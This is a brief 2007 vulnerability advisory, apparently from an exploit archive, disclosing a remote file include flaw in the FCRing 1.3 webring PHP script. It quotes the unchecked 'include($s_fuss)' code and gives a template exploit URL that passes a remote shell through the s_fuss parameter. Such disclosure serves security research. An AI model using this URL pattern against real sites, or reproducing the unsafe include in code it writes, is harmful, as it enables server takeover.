FCRing <= 1.31 (fcring.php s_fuss) Remote File Include Vulnerability

2007-02-23 00:00:00

FCRing 1.3 Webringskript

*****************
Found by kezzap66345 *
*****************
Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=fcring&title=FCRing%201.3
*****************
ERROR:


if($s_fuss != "")
include($s_fuss); <<< rfi coded


**************************************************************************************
RFI:

http://SITE.com/path/fcring.php?s_fuss=[SHELL]


**************************************************************************************
kezzap66345[at]hotmail[dot]com

******thanx=x0r0n*str0ke*shika********************************************************

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.